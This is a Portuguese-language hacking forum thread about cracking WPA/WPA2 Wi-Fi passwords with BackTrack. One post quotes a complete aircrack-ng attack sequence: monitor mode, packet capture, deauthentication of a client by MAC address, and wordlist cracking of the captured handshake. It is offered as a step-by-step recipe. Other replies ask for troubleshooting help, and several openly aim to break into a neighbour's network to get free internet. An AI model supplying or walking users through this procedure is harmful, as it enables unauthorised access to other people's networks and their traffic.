Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Crack WPA ou WPA2 (Backtrack)

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #16
    Desculpa, eu sou novo aqui no Forum e tals, estou aprendendo mais sobre hackear Rede wireless etc.
    estou com grande dificuldade sobre o Backtrack 3 ... usanodo o Shell console ... quando digito alguma coisa ele nao fica igual as tutoriais que eu vi .... e estou com grande dificuldade de conseguir e etc ... se alguem entende poderia meda uma ajuda em particula ... ?? eu vou deixa meu msn aqui caso queria me adc... e me da uma força , eu agradeço desde ja !!! ... !! msn: Maycon_tuzze@hotmail.com
    Hahaha eu estalei o blacktrack 3 aki usando o VMware Como meu windows Precisa desse programa pra estalar (windows 7) aii e tals segui um tutorail pra estalar foii tudo perfeito , aii estou usando outro aki para hackear intent wep etc os demais redes !! .. so que quando eu abro o wireless assistant do programa da um erro !!! Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... <<< imagem do erro ... se alguem puder me ajuda obrigado ... da um aviso !! oque tenho que fazer, como fazer etc !! quizer me adc no msn e me ajudaria mais ainda :S to mo tempao sem internet ta foda :S o vizinho boto senha na net me fudeu :S e nao to afim de paga 140 reais numa internet podendo ter de graça !! ele quase nao vigia a internet dele :S se eu fica ele nem vai percebe ;S
    Lembre-se: As folhas às vezes caem, mas nem sempre a árvore morre

    No mundo em que vivemos ter opinião é ser do contra!


    sigpic

    Comment


    • Font Size
      #17
      descibri ja o wendel me deu uma visao ja !!!... como o meu e notbok nao pega o VMwarem so pra USB... o meu tem que da boot etc etc mais gravei o boot num cd igual ele pediu e nao deuu certo nao :S !! mais continuo tentando mecher no backtrack 3 ... alguem tiver akiii querendo ser meu professor uhashuashuashuashuashusahuasuh !!
      Lembre-se: As folhas às vezes caem, mas nem sempre a árvore morre

      No mundo em que vivemos ter opinião é ser do contra!


      sigpic

      Comment


      • Font Size
        #18
        Muito obrigado cara! Informação útil, depois posto os resultados.
        “To escape criticism – do nothing, say nothing, be nothing.” – Elbert Hubbard

        Comment


        • Font Size
          #19
          no meu aki da erro logo no primeiro tem uma placa pci ralink e uso o backtrack 4 r2 porque será?

          Comment


          • Font Size
            #20
            ei amigo... na video aula, nao tem nada sobre o download do programa os arquivos necessarios...podeira me ajudar?.. abraços

            Comment


            • Font Size
              #21
              A principal diferença em WEP e WAP é que a WEP utiliza apenas 1 chave numérica para ocorrer a autenticação e transferencia de dados.
              A WAP utiliza 2 chaves numéricas, sendo uma privada e uma pública, no entando de tempo em tempo essa chave numérica se altera automaticamente dificultando assim.

              Parabéns pelo vídeo amigo.

              Comment


              • Font Size
                #22
                como eu aco meu endereço de mac?

                Comment


                • Font Size
                  #23
                  me ajudem plz, aqui eu estou c o Backtrack 4 r2

                  qnd coloco o primeiro comando: rmmod ath_pci ele fala :

                  ERROR: Module ath_pci does not exist in /proc/modules


                  oque tenho que fazer? baixar esse module? eu uso BT no cd live.. vlw

                  Comment


                  • Font Size
                    #24
                    gostei d+ mas o backtrack nao parece ser tao facil

                    Comment


                    • Font Size
                      #25
                      consegui arrumar aquele problema citado: eu criei um module com o que faltava


                      alguem pode me respoder a essa pergunta?
                      é sobre word lista.txt

                      assim eu vi q no backtrack tem 2 arquivos la um de 34mb e outro de 400mb mas nao sei ao certo se é wordlist, eu gostaria de saber se tem que, você mesmo colocar uma wordlist.txt no backtrack, e em qual localidade..
                      não sei, pq tipo qnd eu executo esse msm comando, ele fala que nao foi encontrado o file..
                      "root@bt:~# aircrack-ng -0 -w wordList.txt wp"


                      Obrigado
                      AbraçO!

                      Comment


                      • Font Size
                        #26
                        Postado Originalmente por wendel Ver Post
                        Voce acha que está seguro só porque colocou WPA ou WPA2 em sua rede Wireless? Então veja como você não esta tão seguro assim !

                        Comandos:
                        Código:
                        root@bt:~# rmmod ath_pci
                        root@bt:~# modprobe ath_pci
                        root@bt:~# airmon-ng stop ath0
                        root@bt:~# airmon-ng start wifi0 6
                        root@bt:~# airodump-ng -c6 -w wpa ath0
                        
                                                                            BSSID                      STATION
                        root@bt:~# aireplay-ng -0 1 -a 00:0D:88:F1:61:B4 -c 00:1E:C2:A9:C5:39 ath0
                        root@bt:~# 
                        root@bt:~# Temos que aguardar a captura do handshake
                        root@bt:~#
                        root@bt:~# aireplay-ng -0 1 -a 00:0D:88:F1:61:B4 -c 00:1E:C2:A9:C5:39 ath0
                        root@bt:~#
                        root@bt:~# Pronto agora é só correr para o abraço
                        root@bt:~#
                        root@bt:~# aircrack-ng -0 -w wordList.txt wp
                        root@bt:~# aircrack-ng -0 -w wordList.txt wpa-01.cap
                        root@bt:~#
                        Download da Video Aula:
                        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
                        Senha: guiadohacker.com.br

                        Obs. Extenção .swf, é so vc abrir com o Mozilla Firefox, ou se vc tiver o Adobe Flash CS4 instalado use ele para abrir o video.

                        Creditos a: racerx_101

                        Link reupado por CassioRodrigo
                        Muito Obrigdo.

                        Comment


                        • Font Size
                          #27
                          cara não da na hora desse comando root@bt:~# airodump-ng -c6 -w wpa ath0
                          não aparece as redes mais se eu usar airodump-ng wlan0 aparece mais não aparece a mac no bssid de baixa
                          e nem no estatus

                          Comment


                          • Font Size
                            #28
                            Vo testa aqui valeu!
                            Muito util, de verdade!

                            Comment


                            • Font Size
                              #29
                              Muit bom este post..
                              Ejeeton Jean dos santos nunes

                              Comment


                              • Font Size
                                #30
                                alguem aqui ja conseguiu quebrar a WPA2?carai a senha do meu vizinho nao quebraa...

                                Comment

                                X
                                Working...
                                X